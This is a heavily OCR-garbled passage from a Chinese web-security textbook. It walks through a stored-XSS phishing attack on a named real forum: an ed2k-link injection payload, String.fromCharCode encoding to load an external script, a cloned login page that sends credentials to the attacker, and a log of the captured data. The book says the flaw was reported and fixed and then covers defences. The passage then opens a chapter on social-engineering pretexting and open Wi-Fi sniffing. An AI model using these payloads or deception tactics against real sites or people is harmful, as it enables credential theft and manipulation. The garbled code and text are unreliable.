Web 渗 透 与 代码 审计 章节 详细 说 明 。 因 为 这 个 站 的 密码 用 MD5 加 密 ， 还 加 了 http_only 标 
签 ， 所 以 最 便捷 的 攻击 方式 就 是 XSS 钓 鱼 了 。 这 个 漏洞 的 详细 成 因 在 代码 审计 章节 中 已 经 
分 析 完 毕 。 下 面 来 重 现 一 下 如 何 利用 这 个 XSS 漏 洞 进行 钓鱼 攻击 。 

该 漏洞 已 提交 漏洞 平台 并 修复 。 

自 先 找到 这 个 论坛 的 登录 页 面 ， 在 右上 和 角 随 便 输入 一 个 用 户 名 和 密码 就 能 进入 登录 专 
用 的 页 面 ， 如 图 6-47 所 示 。 

然后 审 玛 元 素 把 相关 的 资源 都 下 载 下 来 ， 也 可 以 在 审 租 元 素 的 Network 页 面 下 刷新 ， 

会 显示 出 加 载 的 内 容 ， 然 后 下 载 即 可 ， 如 图 6-48 所 示 。 


| 4 < <> $ http://wwwxxzhushou.cn/user/login.php?from=bbs 
бе 1 
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图 6-47 论坛 登录 界面 图 6-48 下 载 相 关 资 料 
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然后 用 Dreamweaver 修 改 HTML 代 码 ， 改 的 时 候 注 意 考 虑 一 下 要 怎样 实施 钓鱼 ， 笔 者 
想到 了 两 种 方式 : 

(1) 清空 原 页 面 的 东西 然后 加 载 钓 鱼 页 面 的 元 素 。 

> 优点 : 地 址 栏 地 址 不 会 变 ， 仍 在 一 个 域名 下 不 容易 引起 怀疑 。 

> 缺点 : JS 的 document 没 办 法 访问 <head> 标 签 下 的 元 素 ， 所 以 我 们 要 把 载 入 CSS、 编 
码 、 载 入 JS 等 都 写 在 <body> 里 ， 而 且 如 果 原 页 面 在 <head> 里 定义 了 背景 ， 那 么 清 
空 <body> 并 重 写 ， 之 后 样式 不 太 好 做 。 

(2) XSS 后 跳 转 到 另 一 个 域 下 的 页 面 。 

> ЖЕ: 不 需要 对 源码 进行 大 改动 ， 还 原 度 高 。 

> 缺点 : 地 址 栏 里 能 看 到 跳 转 的 地 址 ， 细 心 的 人 或 了 解 安 全 技术 的 人 会 发 现 域名 不 
对 ， 会 留心 一 下 。 

在 这 里 笔者 选择 了 第 2 种 方式 。 

在 考虑 这 两 种 方法 之 前 先 看 一 下 这 个 注入 点 的 特性 。 

发 帖 的 时 候 包 含 这 侣 : 

ed2k: //|file|lovely| '+ 想 要 执行 的 JS 代码 + ' ltest/ 

将 JS 代 码 写 到 加 号 中 间 就 能 XSS， 如 图 6-49 和 图 6-50 所 示 。 


ios8.3 可 以 用 叉 叉 助手 越王 么 ? 还 可 输入 41 个 字符 

Ж „кк -@ ФЕ “ата 
B ГОА Реф ҖӘ НЕ га ын O m) Шо 
如 题 ,ios8.3 可 以 用 又 叉 助 手 越狱 么 ? 


ed2k://|fie|lovely|'+alert(123)+'|test/ 


БЕДЕ [а= 


ios8.3 可 以 用 又 叉 助 手 越狱 么 ? 


M 发 于 3 Жай › 


如 题 ， ios8.3 可 以 用 义 义 助手 越狱 么 : 


юу '+alert(123)+' Bytes 


图 6-50 ”测试 结果 
但 是 中 间 插 入 的 JS 代 码 不 能 含有 各 种 引号 ， 这 样 会 闭合 | ¿m ,ossspunysasumw? 
payload 中 的 引号 导致 JS 不 能 正确 执行 ， 如 图 6-51 所 示 ， 没 有 | ovey taere Bytes 


Ж. 额 额 额 求 回复 


按 F12 键 能 看 到 这 里 的 情况 。 


图 6-51 加 入 引号 
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这 个 XSS 很 鸡肋 ? Ко No No， 这 里 可 以 用 HIML 的 <scrip 伺 标签 来 测试 。 


<ЗСЕТРЕ SFC Http: оо. же e T ea 8 $ 3 L> 


可 以 看 到 这 个 方法 不 需要 使 用 引号 就 能 合法 加 载 外 部 JS 脚本 ， 但 是 直接 写 上 面 的 代码 
的 话 尖 括 号 会 被 转 义 ， 于 是 我 们 这 样 使 用 : 


ed2k://|filel|lovelyl'+document.write (String.fromCharCode (这 里 使 用 ASCII 
14)) +" |test/ 


在 String.fromCharCode 的 参数 里 填 入 原来 想 要 加 载 的 payload 的 ASCII 码 ， 比 如 <script 
src=http://.…..></scrpi 刀 这 人 句 话 的 ASCII 码 如 下 。 


БО и Ша о 1та 30 БГ. ш шы К, ти ш ыы; ШЖ. к ал. 
46,46,46,46,46,46,46,46,46,46, 46, 46, 62, 60, 47,115, 99,114,112,105,116,62 
( 十 进 制 ) 


所 以 构造 代码 如 下 。 


ed2k://|file|lovelyl|'+document.write (String.fromCharCo de(60,115,99,114, 
105, 112, 116, 32; 1157114 99, 61,104, 116, 116,112, 58,47, 47,46, 46, 46,46, 46, 46, 46, 
46.46 46:46:46. 62.60.11. 115-55 114. 112 105 116.62) ) + ТІгезг/ 


这 样 我 们 就 没有 使 用 双 引 号 载 入 外 部 JS。 

下 面 介 绍 上 文中 两 种 方法 的 实现 过 程 。 

(1) 第 一 种 方法 。 首 先 把 HTML 中 <head> 里 加 载 的 CSS 样 式 、JS 脚 本 移 到 <body> 中 
( 拖 到 最 前 面 ， 让 它 先 加 载 ) ， 然 后 使 用 document.body.innerHTMLO 的 方式 将 <body> 标 签 
中 的 元 素 修改 为 登录 页 面 的 样式 ， 这 里 就 不 详细 介绍 了 。 

为 什么 笔者 放弃 了 这 种 方法 昵 ， 一 个 是 <body> 标 签 中 的 JS 无 法 直接 访问 <head> 标 签 
中 的 元 素 ， 所 以 不 能 删除 背景 ， 只 能 用 一 个 白色 的 层 遮 住 原来 的 页 面 。 当 然 这 只 是 一 个 问 
题 ， 还 有 一 个 问题 是 String.fromCharCode() 参 数 如 果 是 中 文 的 ASCII 码 时 可 能 会 导致 乱码 ， 
这 种 方法 的 特点 在 于 不 会 跳 转 域名 ， 所 以 不 容易 被 察觉 。 

(2) 第 二 种 方法 。 在 外 部 载 入 的 JS 中 利用 windowjlocation href-http:/… ; 的 方式 跳 转 到 自 
己 存放 钓鱼 页 面 的 地 址 〈 此 处 没有 在 payload 中 实现 ， 请 读者 思考 一 下 ， 为 什么 ? ) 。 

然后 将 钓鱼 页 面 的 HIML 修改 一 下 按钮 的 JS 代码 。 

找到 注册 侦 听 的 位 置 ， 如 图 6-52 所 示 。 执 行 这 个 函数 ， 如 图 6-53 所 示 。 


Бе анан) аак login )1 


6-52 ”注册 侦 听 的 位 置 Ё 6-53 ”执行 函数 
把 login 里 的 内 容 改 成 把 账号 、 密 码 输入 框 内 的 东西 并 发 送 到 目 己 的 服务 器 ， 发 送 完 了 
让 页 面 再 跳 转 到 论坛 主页 ， 让 这 次 钓鱼 不 会 被 怀疑 。 
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注意 : 跳 转 页 面 的 时 候 一 定 要 注意 ， 不 要 把 跳 转 的 代码 接站 发送， 如 果 发 送 没 有 执 
行 完 就 跳 转 是 不 会 发 出 包 的 ， 所 以 我 们 要 用 setTimeout(function, time); 的 方式 延迟 跳 
转 。 笔 者 在 一 开始 跳 转 到 钓鱼 页 面 的 时 候 还 让 它 弹 了 个 窗口 说 “登录 状态 异常 ， 请 重 
新 登录 ”， 然 后 又 传 了 cookie data refer 等 数据 (这 里 没有 用 ， 是 因为 不 在 同一 个 域 ， 这 
个 cooKkie 不 是 论坛 的 ， 不 过 读者 可 以 在 第 一 次 跳 转 前 就 顺便 发 过 来 ， 这 样 就 是 论坛 下 的 
cookie í ) ào 

然后 我 们 就 能 收 到 钓鱼 页 面 发 送 来 的 信息 了 。 

如 果 帖 子 需要 审核 ， 那 么 管理 员 打开 帖子 的 时 候 就 会 触发 XSS， 第 一 个 被 击 中 的 就 会 
是 管理 员 的 号 。 


(1) 触发 了 XSS， 如 图 6-$4 所 示 。 


图 6-54 ”触发 KSS 
(2) 跳 转 进入 了 钓鱼 页 面 ， 可 以 看 到 域名 发 生 了 变化 ， 如 图 6-55 所 示 。 
(3) 输入 用 户 名 和 密码 ， 如 图 6-56 所 示 。 


叉 叉 助手 


х) 3 Ж 4х, 17 я $ y 
БЕЗДІ ОУ W ч 
—Dm 


abcd123456 


图 6-55 ”钓鱼 页 面 图 6-56 ”输入 用 户 名 与 密码 
单 击 “立即 登入 ”按钮 之 后 ， 页 面 就 问 服务 端 发 送 了 账号 和 密码 并 跳 转 到 了 论坛 首 
页 ， 如 图 6-57 所 示 。 
查看 一 下 得 到 的 信息 ， 如 图 6-58 所 示 。 
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安 卓 版 下 载 iPhone 版 下 载 


论坛 首页 Уде УМ 叉烧 家 园 ”活动 专区 ”礼包 中 心 


叉 叉 新 年 有 礼 一 刀 塔 传奇 秀 截图 送 示 礼 


ЕА Е бал ЫЛДЫ > ЕР» UAE 
пя, Маш ТЕТ Уа Ос вина ! 
укла 精彩 推荐 最 新 活动 
ЕЕ 又 又 助手 重 磅 推出 i0S 红 包 神 器 ! 2015-02-18 № 
а евлвензавт) Жс ДӘЛ 2015-02-03 
2 《航海 于 后 航 》 安 卓 辅 助 首发 1.0.1 2015-01-31 
hz А + ЧЕ та: Въ точен 1 n 0 5715 пъ 22 


图 6-57 论坛 首页 


124.95.126.8 | 2015-02-24 23:37:13 

Useragent: Mozilla/5.0 (Windows МТ 6.1; №064; Trident/T.Ü; гу: 11.0) like Gecko 

Referer: |77722 2 oein. html 

DATA: U browser': U пале”: mozilla’, version : 11.0 1, ua : Моті11а/5.0 (Windows МТ 6.1; WOW64; Түійегі/7.0; 91062; „МЕТ CLR 


2.0. 50727; ‚ МЕТ СІК 3.5. 30729; „МЕТ СІК 3.0. 30729; Media Center РС 6.0; „МЕТА. 0C; „МЕТА. ОЕ; үч:11.0) like Cecko "Талес": zh- 
CN, 'referrer' :’ http: “en xxzhushou. cr/thread-104504-1- 

1. htal', 'location МАРА oein, html’, toplocation’ : http:/ 
го ВА: БОЕВ, 1234564 F: 


login. html’ ,’ cookie’ :'”,”' domain’ :' 


图 6-58 ”查看 得 到 的 信息 
如 果 不 会 写 服务 端 和 发 送 数 据 ， 可 以 参考 一 下 网 上 的 例子 ， 也 可 以 修改 XSS 探 针脚 本 
xssprobe 的 源码 (网 上 可 以 找到 〉。 
至 于 如 何 防 御 这 种 基于 钓鱼 页 面 的 攻击 ， 第 2 章 中 有 详细 说 明 ， 各 位 不 妨 市 看 新 知识 
翻 回去 再 复习 一 坎 。 


6.5 B|) 


相信 大 家 现在 对 前 问 漏 洞 的 形成 原因 和 攻击 的 方法 都 有 了 一 定 的 了 解 ， 只 有 熟悉 了 
“攻击 ”， 才 能 更 加 深入 地 了 解 “防御 ”， 半 葛 ， 防 御 总 是 比 攻击 困难 。 接 下 来 将 进入 防 
ШЕ ЫЕ: ШЕ ЖЕР 

防御 前 端 攻击 的 主要 角度 有 3 个 。 


1. Мер Bi l 


Web 端 防御 即 在 Web 层 面 、 代 码 层面 杜绝 XSS 形 成 ， 在 编写 程序 时 应 该 谨慎 处 理 每 一 
个 最 终 会 被 输出 至 页 面 的 参数 ， 时 刻 牢 记 任何 来 自用 户 的 输入 都 可 能 是 不 可 信 的 ， 对 常规 
参数 ， 如 <、>、= 等 敏感 符号 进行 过 滤 ， 操 作 富 文本 元 素 时 ， 针 对 <script> 标 签 以 及 类 似 
onload、onerror 等 常用 JS 事 件 元 素 进 行 过 滤 ， 以 杜绝 恶意 JS 的 执行 ， 同 时 网 络 上 已 经 出 现 
了 很 多 有 效 的 、 高 质量 的 XSS 过 滤 脚 本 ， 可 以 直接 引用 。 
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2. ВР 


前 端 漏洞 不 同 于 注入 攻击 等 漏洞 ， 它 们 中 的 一 些 漏洞 〈 例 如 反射 型 XSS) 在 一 定 程度 
上 还 是 要 依靠 用 户 的 人 为 触发 ， 押 以 作为 用 户 ， 安 全 意识 也 必 不 可 少 。 

目前 主要 的 攻击 方式 是 在 看 似 可 信 的 网 站 中 插入 恶意 JS 代 码 执行 ， 和 常常 让 人 防 不 胜 
防 ， 所 以 养 成 一 个 警惕 的 上 网 习惯 非常 重要 ， 例 如 : 

(1) 不 要 轻易 打开 英名 其 妙 的 邮件 ; 

(22 不 打开 陌生 人 发 送 的 不 可 信和 链接 ; 

(3) 不 轻易 打开 被 大 量 转发 的 帖子 竣 热 闸 〈( 因 为 那 可 能 是 黑客 释放 出 的 一 个 XSS 蠕 
虫 ) 。 

总 地 来 说 ， 在 前 端 攻击 面前 用 户 可 以 保护 目 身 的 手段 少 之 又 少 ， 有 时 仍然 是 防 不 胜 
防 ， 所 以 我 们 还 是 应 当 把 期 许 的 目光 放 在 互联 网 安全 事业 的 发 展 上 ， 也 希望 读者 学 完 本 章 
可 以 理解 这 一 现状 ， 为 改善 互联 网 安全 尽 一 份 力所能及 的 力量 。 


З. 浏览 器 防御 


随 看 前 端 安全 问题 越 来 越 受 重视 ， 浏 览 器 厂商 们 也 开始 行动 起 来 ， 试 图 为 用 户 提供 更 
加 安全 的 上 网 环境 ， 正 浏览 器 的 XSS filter 和 Chrome 浏 览 器 的 XSS auditor 已 经 可 以 有 效 地 限 
制 反 射 型 XSS 攻 击 ， 如 果 读 者 是 一 个 注重 安全 的 人 ， 把 你 的 默认 浏览 器 设置 成 Chrome 将 会 
是 一 个 非常 明智 的 选择 ， 因 为 大 多 数 基 于 前 问 攻 击 的 恶意 链接 在 它 面 闻 都 可 能 束手无策 。 
也 希望 在 浏览 器 厂商 的 积极 配合 下 ， 前 端 安全 问题 在 未 来 的 几 年 内 可 以 成 为 历史 ， 让 人 们 
的 上 网 环境 在 安全 层面 上 变 得 更 加 无 懈 可 击 。 


6.6 Жо Зи 


前 端 安全 之 旅 到 这 里 就 告 一 段落 了 ， 本 章 简 要 介绍 了 HTML 语 法 和 在 页 面 中 调用 
JavaScript 的 方法 ， 并 深入 浅 出 地 介绍 了 XSS 和 CSRF 攻 击 的 作用 。 相 信 几 个 实战 案例 能 够 
帮助 读者 更 加 直观 地 理解 XSS 攻 击 ， 也 便于 感 兴 趣 的 读者 更 快 上 手 。 最 后 我 们 分 析 了 防御 
前 端 攻击 的 一 些 方法 。 

值得 一 提 的 是 ，XSS 和 CSRF 远 不 是 前 端 安全 的 全 部 ， 基 于 XML 的 XXE 攻 击 等 内 容 在 
本 章 中 都 尚未 提 到 。 安 全 领域 博大 精深 ,没有 什么 人 能 全 方面 地 掌握 所 有 技能 ， 技 在 于 
精 ， 精 在 于 勤 ， 还 希望 读者 多 加 练习 。 也 希望 通过 本 章节 了 解 攻 击 的 内 容 ， 从 而 知道 如 何 
保护 自己 的 个 人 隐私 ， 能 够 对 那些 潜在 的 威胁 防 患 于 未 然 。 
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黑客 们 往往 对 世界 有 看 目 己 一 套 独 特 的 视角 ， 当 恶意 攻击 通过 纯粹 的 计算 机 技术 手段 
无 法 达到 目的 时 ， 高 超 的 情商 将 会 取代 智商 成 为 进一步 打开 突破 口 的 利器 ， 而 研究 这 些 恶 
意 攻 击 行 为 的 安全 人 员 们 同样 会 跟 进 这 些 特 殊 且 神秘 的 手段 ， 长 此 以 往 便 形 成 了 一 套 安 全 
领域 独特 的 理论 : 社会 工程 学 (Social Engineering， 简 称 社 工 ) 。 本 章 将 带 读 者 揭 开 社 
会 工程 学 的 神秘 面纱 ， 领 略 它 的 风采 ， 同 时 介绍 一 些 社会 工程 学 环节 中 常用 的 技巧 ， 这 
些小 技巧 如 果 应 用 到 日 常生 活 中 ， 还 能 帮助 你 在 学 习 、 生 活 和 工作 中 取得 菜 些 意 想 不 到 的 
优势 。 
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说 起 社会 工程 学 ， 我 们 必须 先 将 其 与 以 研究 社会 事实 为 根基 并 帝 着 浓 浓 学 术 气 县 的 社 
会 学 加 以 区 分 ， 虽 然 两 者 的 理论 基础 都 衍生 目 人 类 社会 ， 但 作为 一 门 工程 学 科 ， 社 会 工程 
学 更 强调 对 于 每 个 个 体 和 特定 环境 下 有 限 集合 的 人 群 进行 研究 ， 妃 求实 际 应 用 的 效果 而 非 
理论 本 身 。 从 安全 人 员 的 角度 来 看 其 核心 思想 可 以 用 一 句 很 经 典 的 台词 总 结 : 一 个 安全 体 
系 中 最 薄弱 的 环节 永远 是 人 。 随 看 系统 的 不 断 完善 ， 防 御 力 度 的 不 断 增强 ，“ 人 ”这 一 环 
节 慢 慢 变 成 整个 系统 中 最 容易 被 利用 的 存在 ， 以 人 和 社会 行为 为 研究 对 象 从 而 发 现 漏 洞 并 
实现 突破 的 方案 和 技巧 ， 总 结 其 中 的 规律 并 扩展 利用 范围 ， 总 是 能 够 给 恶意 攻击 者 囊 来 意 
想不到 的 惊 豆 。 为 了 能 让 读者 对 社会 工程 学 攻击 有 一 个 更 直观 的 了 解 ， 笔 者 将 在 后 和 面 的 访 
幅 中 将 社会 工程 学 攻击 中 最 常见 的 方式 加 以 分 类 ， 并 符 插 介绍 实际 应 用 的 技巧 。 

首先 明确 几 个 要 点 。 


1. 什么 是 社会 工程 学 


在 这 门 学 问 被 称 为 社会 工程 学 之 前 ， 它 还 是 一 个 零散 的 集合 体 ， 集 合 了 心理 学 、 社 会 
学 以 及 很 多 有 关 “ 人 ”的 学 问 。 后 来 凯 文 * 米 特 尼 元 (Kevin David Mitnick) 提出 “社会 
工程 学 ”这 个 概念 ， 这 门 学 问 最 吸引 人 的 地 方 贡 过 于 它 可 以 使 人 顺从 你 的 意愿 ， 然 后 告诉 
你 想 知道 的 信息 或 是 按照 你 的 意愿 去 做 某 些 事 ， 这 确实 很 奇妙 ， 却 又 令 人 不 寒 而 栗 ， 在 安 
全 领域 的 作用 也 是 不 言 而 喻 。 


2. 社会 工程 学 是 否 只 是 一 种 欺骗 的 技巧 呢 


看 到 社会 工程 学 的 定义 ， 有 些 人 可 能 会 认为 社会 工程 学 不 就 是 一 种 骗 人 的 技巧 吗 ? 其 
实 社 会 工程 学 包括 很 多 不 同 的 形式 ， 它 的 确 是 一 种 技巧 ， 但 并 非 是 一 种 欺骗 的 技巧 。 笔 者 
曾 在 茶 计 算 机 相关 论坛 中 随机 发 放 了 100 份 关于 社会 工程 学 的 调查 问卷 ， 有 意思 的 是 ， 接 
近 七 成 的 人 认为 社会 工程 学 就 是 利用 他 人 的 好 奇 心 、 好 胜 心 甚至 同情 心 来 进行 欺骗 ， 但 实 
际 上 社会 工程 学 的 用 途 并 不 是 负面 的 ， 它 是 一 种 无 正 负 属 性 的 技艺 ， 全 看 使 用 它 的 人 来 赋 
予 它 何 种 意义 。 


— ЖА -- 


第 7 章 ” 初 识 社会 工程 学 一 一 bug 出 在 人 身上 = ТЕ 


3. 社会 工程 学 离 我 们 的 生活 有 多 远 


相信 读者 应 该 能 猜 到 答案 。 没 错 ! 社会 工程 学 在 我 们 的 生活 中 无 处 不 在 。 医 生 在 询 
问 病情 的 时 候 你 已 经 赋予 了 他 “权限 ”， 他 知道 了 你 的 私人 信息 ; 销售 人 员 则 在 推销 产品 
时 ， 不 经 意 间 就 会 用 到 心理 学 等 方式 来 促使 人 们 产生 购买 茶 种 产品 的 欲望 ， 这 些 都 是 社会 
工程 学 在 生活 中 的 体现 ， 社 会 工程 学 无 处 不 在 。 


4. 为 什么 要 掌握 社会 工程 学 


正如 服务 器 安全 是 建立 在 对 服务 器 的 渗透 测试 上 一 样 ， 人 的 安全 也 要 建立 在 了 解 社会 
工程 学 之 上 ， 大 多 数 被 攻击 的 人 都 缺乏 安全 意识 ， 甚 全 根本 不 知道 社会 工程 学 为 何 物 ， 而 
攻击 者 正好 利用 这 个 bug 趁 虚 而 入 ， 进 行 攻 击 。 社 会 工程 学 可 以 让 人 们 对 社交 有 一 种 新 的 
视角 ， 增 强人 们 在 社交 方面 的 各 种 能 力 ， 了 解 并 和 擎 握 社 会 工程 学 ， 不 仅 能 帮助 人 们 防御 攻 
击 ， 还 能 给 人 们 的 社会 生活 带 来 很 大 益处 。 


5. 如 何 熟 练 掌 握 社 会 工程 学 


社会 工程 学 涉及 人 性 的 优点 与 弱点 ， 如 果 想 熟练 掌握 社会 工程 学 ， 就 需要 各 种 相关 知 
识 ， 例 如 心理 学 、 密 码 学 、 逻 辑 学 等 ， 也 必须 阅读 一 些 其 他 方面 的 相关 书籍 ， 例 如 卡耐基 
的 《人 性 的 弱点 》、Christopher Hadnagy 的 《社会 工程 一 一 安全 体系 中 的 人 性 漏洞 》 等 著 
作 。 男 外 一 定 要 有 意识 地 培养 目 己 的 换 位 思考 能 力 ， 这 种 能 力 在 社会 工程 学 中 起 看 十 分 重 
要 的 作用 。 
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社会 工程 学 讲究 逻辑 性 ， 所 以 一 套 完 备 的 流程 显得 尤为 重要 ， 接 下 来 一 起 看 看 社会 工 
程 学 所 涉及 的 知识 。 


7.2.1 信息 搜集 


“ 知 和 外 知己 ， 百 战 不 列 ”，《 和 孙子 兵 法 》 中 的 这 人 句 名 言 用 在 这 里 十 分 恰当 。 从 古代 
开始 ， 人 们 就 了 解 到 信息 情报 的 价值 ， 在 “兵力 ”相当 的 情况 下 ， 信 息 搜集 就 是 制胜 的 关 
键 。 那 么 对 于 一 次 社会 工程 学 活动 ， 基 本 流程 是 什么 ?总 的 来 说 ， 就 是 获得 尽 可 能 详细 的 
信息 情报 ， 伪 装 成 一 个 “特定 喘 份 ”， 掌 握 足 够 的 专业 术语 ， 对 事情 过 程 的 逻辑 链 进行 分 
析 预 测 ， 知 悉 和 “目标 ”接触 中 所 需要 问 的 问题 或 者 需要 操纵 的 事情 ， 突 发 事件 的 即时 应 
对 以 及 最 后 如 何 收 场 。 要 说 其 中 最 重要 的 环节 ， 必 然 是 信息 搜集 了 ， 信息 搜集 是 完成 一 
次 社会 工程 学 活动 的 基础 条 件 ， 对 信息 的 擎 握 程度 在 一 定 程度 上 直接 影响 了 社工 活动 的 
进程 。 
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至 于 如 何 进行 信息 搜集 ， 除 了 在 第 3 章 中 已 经 学 习 的 基本 信息 搜集 以 外 ， 社 交 网 络 信 
县 搜集 在 社会 工程 方面 的 应 用 更 为 广泛 。 一 个 人 在 网 络 上 总 会 留 下 痕迹 ， 而 信息 搜集 要 做 
的 就 是 找到 这 些 痕 迹 ， 并 通过 分 析 这 些 痕 迹 来 得 到 更 多 的 关于 目标 的 信息 。 姓 名 、 电 话 、 
爱好 等 信息 都 是 十 分 容易 获得 的 ， 而 利用 这 些 信息 又 可 以 获得 更 多 更 需要 的 信息 。 掌 握 更 
多 的 信息 技术 ， 对 于 信息 搜集 来 说 益处 展 多 《〈 例 如 人 们 可 以 通过 一 张 照片 的 EXIF 信 息 便 
可 以 很 方便 地 找 出 这 张 照片 拍摄 的 位 置 、 拍 摄 的 工具 等 )。 


7.2.2 巧妙 地 伪 疾 和 大 胆 地 接触 目标 


伪装 ， 跟 踪 ， 人 为 制造 “相遇 ”的 巧合 ， 高 科技 销 取 信息 ， 人 快速 逃 离 现场 。 这 看 起 来 
就 像 是 在 读 战 片 中 才 会 出 现 的 场景 ， 其 实现 代 恋战 片 情节 很 大 程度 上 参考 了 社会 工程 学 的 
理念 ， 或 者 可 以 说 ， 间 读 活 动 本 身 就 是 一 种 高 级 的 社会 工程 学 行为 。 在 社会 工程 学 攻击 者 
眼中 ， 近 距离 接触 目标 是 最 有 意思 的 环节 了 ， 现 代 科 技 尤其 是 互联 网 技术 给 “与 目标 保持 
距离 的 同时 午 取 信息 ”提供 了 完美 的 桥梁 ， 这 距离 可 以 是 $ 米 、10 米 ， 也 可 以 是 相 隅 千里 
通过 网 络 保 持 联 系 。 黑 客 通常 使 用 人 机 互动 的 方式 来 获取 信息 ， 但 有 时 主动 出 击 能 市 来 更 
好 的 效果 。 本 节 中 笔者 将 与 读者 们 分 享 更 多 的 接触 型 社会 工程 学 攻击 技巧 ， 并 针对 这 些 技 
巧 提出 防范 方案 。 


7.2.3 伪装 的 艺术 


当 社 会 工程 学 攻击 者 试图 达成 一 个 目标 时 ， 往 往 会 对 日 己 进行 一 定 的 伪装 。 这 种 伪装 
并 不 是 随意 的 ， 而 是 根据 目标 和 将 要 实施 的 行动 进行 选择 性 伪装 。 当 目标 是 一 名 教授 时 ， 
想 要 接近 他 /她 ， 攻 击 者 会 套 上 T 恤 ， 穿 上 和 牛仔裤 与 运动 鞋 ， 背 上 一 只 看 起 来 塞 满 了 书 的 休 
闲 包 ， 最 好 再 戴 上 一 副 看 起 来 文 约 约 的 眼镜 ， 以 学 生 的 身份 出 场 往往 会 是 个 好 主意 。 而 目 
标 是 一 家 公司 时 ， 送 快递 的 小 哥 套 装 则 是 更 合适 的 选择 。 相 比 神秘 复杂 的 易 容 术 ， 一 只 魔 
术 头 由 有 时 候 可 以 带 来 更 好 的 效果 ， 在 遮 住 2/3 面 部 的 情况 下 ， 带 上 帽子 会 减少 引起 注意 
的 几率 。 这 些 道具 都 非常 好 找 ， 通 过 一 个 网 上 商城 就 可 以 全 部 办 到 。 攻 击 者 给 自己 准备 多 
种 身份 的 名 卢 也 是 很 重要 的 步骤 。 

上 面 的 描述 是 现实 中 的 伪装 ， 在 外 形 和 行为 上 尽情 发 挥 和 目 己 的 想象 力 ， 有 些 人 便 能 够 
获得 无 数 种 身份 。 不 过 ， 互 联网 时 代 还 给 攻击 者 市 来 了 另 一 种 伪装 的 方式 ， 在 网 上 与 目标 
接触 时 ， 只 需要 极 少 的 努力 ， 一 些 社交 软件 账户 和 简单 的 引导 性 交流 ， 剩 下 的 步骤 便 全 部 
由 对 方 的 想象 力 完成 。 这 也 意味 着 如 何 出 现 变 得 非常 重要 。 互 联网 上 的 人 们 多 半 对 陌生 
人 有 看 很 蜗 的 警惕 性 ， 所 以 一 个 失败 的 出 场 或 者 不 断 地 角色 变更 会 导致 彻 抵 失去 对 方 的 
信任 。 

而 在 现实 中 ， 这 样 的 接触 也 是 有 看 极 局 技巧 性 的 。 人 是 群居 动物 ， 人 们 每 天 都 在 和 不 
同 的 人 接触 。 虽 然 有 着 固定 的 小 圈子 并 对 陌生 人 有 者 天 生 的 稍 持 ， 却 也 不 会 拒绝 与 那些 有 
充分 理由 出 现 的 人 交流 。 当 交流 成 为 必要 时 ， 珊 着 充足 的 理由 出 现在 目标 的 面前 绝 不 会 太 
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糟糕 ， 对 于 普通 人 而 言 ， 学 会 倾听 ， 目 信 的 交流 风格 往往 足够 带 来 一 个 恨 好 的 社交 图， 与 
意气 相投 的 人 磨合 而 成 为 朋友 不 是 一 件 困 难 的 事情 。 但 对 于 一 个 社会 工程 师 来 说 ， 接 触 是 
短暂 的 ， 所 以 一 定 要 在 最 短 的 时 间 内 把 效率 最 大 化 ， 同 时 也 出 于 保护 目 身 的 原因 ， 伪 装束 
有 了 存在 的 必要 性 ， 有 针对 性 地 将 目 己 伪装 成 一 类 人 并 用 这 个 伪装 的 身份 与 目标 交流 ， 获 
取信 息 非 党 有 效 ， 但 也 限制 了 沟通 的 次 数 和 时 间 : 在 伪装 身份 下 过 于 频 闯 地 与 目标 接触 很 
容易 引起 对 方 管 觉 或 异常 的 感受 。 

然而 ， 大 多 数 情况 下 即使 是 现实 中 出 击 的 社会 工程 学 攻击 者 并 没有 必要 把 目 己 置 于 
离 目 标 太 近 的 位 置 。 因 为 每 个 人 在 生活 中 其 实 都 在 不 停 地 传播 和 日 己 相关 的 信息 。 走 过 的 
路 ， 购 买 的 食物 ， 进 行 沟通 的 人 群 等 都 能 反映 出 目标 的 特征 。 社 会 工程 师 通 过 成 为 一 个 观 
察 者 即 可 得 到 大 量 的 信息 ， 而 互联 网 还 之 来 新 的 便利 。 个 人 通过 网 络 癌 外 传播 的 信息 量 同 
样 很 大 ， 所 以 作为 接触 者 ， 除 了 面对面 交流 和 保持 一 定 距离 的 观察 外 ， 使 监控 者 进行 主动 
攻击 也 成 为 了 可 能 ， 这 一 切 只 需要 一 个 随身 携带 的 移动 热点 ， 并 不 停 地 更 换 热 点 名 称 葡 能 
办 到 。 很 多 人 在 发 现 目 己 的 身边 有 没 设置 密码 的 无 线 热 点 时 都 会 党 不 犹 移 地 连接 进去 ， 丝 
塞 不 顾虑 洪 在 的 安全 问题 。 这 时 只 需要 在 网 关 处 进行 抓 包 《还 记得 在 无 线 安 全 章节 的 知识 
吗 ? 下 次 各 位 连接 没有 密码 的 WiFi 时 ， 可 要 注意 一 人 下) ， 即 可 获取 用 户 通过 互联 网 同 外 发 
送 以 及 同 内 接收 的 信息 ， 从 而 获得 达成 目标 的 机 会 。 

掌握 足够 多 的 专业 术语 既 能 够 让 你 的 目标 相信 你 所 扮演 的 身份 ， 也 能 让 对 话 更 和 谐 轻 
松 地 进行 下 去 。 专 业 术 语 的 必要 性 在 于 ， 对 方 了 解 你 的 身份 之 后 ， 知 道 你 了 解 对 应 的 知识 
或 者 冲 识 术语 ， 能 从 侧面 证 实 你 的 号 份 ， 使 你 的 身份 更 加 符合 你 押 希 望 扮演 的 角色 ， 并 且 
为 接 下 来 的 社工 活动 做 铺垫 。 当 然 ， 一 个 合理 的 场景 和 话题 也 同样 重要 ， 即 便 你 掌握 再 多 
的 专业 术语 ， 用 错 了 场合 ， 那 也 是 白搭 。 下 面 来 看 一 个 例子 : 如 有 果 想 通过 “单车 爱好 者 ” 
的 喘 份 接近 男 一 位 “单车 爱好 者 ”， 那 么 你 除了 掌握 单车 运动 的 各 种 专业 术语 之 外 ， 还 需 
要 和 擎 握 其 中 的 一 些 忌 讳 ， 例 如 借 车 一 一 在 爱 车 如 命 的 单车 世界 里 借 车 完全 是 外 行人 才 会 干 
的 事 。 


7.2.4 交流 的 技巧 


除了 伪装 ， 交 流 对 于 社会 工程 学 也 尤为 重要 ， 下 面 将 通过 实例 来 分 析 一 些 实 用 的 社会 
工程 学 交流 技巧 。 

很 多 人 认为 ， 人 类 和 动物 最 大 的 区 别 束 在 于 人 们 拥有 一 套 完整 而 高 级 的 语言 体系 ， 可 
以 让 每 个 个 体 间 更 好 地 相互 交流 ， 促 进 思想 的 融合 和 社会 的 进步 。 很 多 人 说 ， 交 流 是 一 门 
艺术 ， 可 事实 上 人 们 的 大 脑 往往 都 只 是 用 “会 说 话 ” 三 个 字 来 描述 这 门 “ 艺 术 ”。 那 么 交 
